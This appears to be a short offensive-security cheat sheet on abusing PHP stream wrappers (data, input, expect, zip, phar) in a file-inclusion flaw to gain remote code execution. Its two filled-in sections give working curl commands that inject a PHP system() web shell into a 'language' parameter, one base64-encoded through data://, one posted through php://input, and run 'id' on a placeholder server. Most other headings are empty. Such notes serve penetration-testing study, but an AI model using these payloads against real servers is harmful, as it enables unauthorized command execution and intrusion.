PHP Wrappers
Data Wrapper
Pre-requisites
Remote Code Execution
$ curl -s "http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id"Input Wrapper
Pre-requisites
Remote Code Execution
$ curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"Expect Wrapper
Pre-requisites
Remote Code Execution
Zip Wrapper
Phar Wrapper
Last updated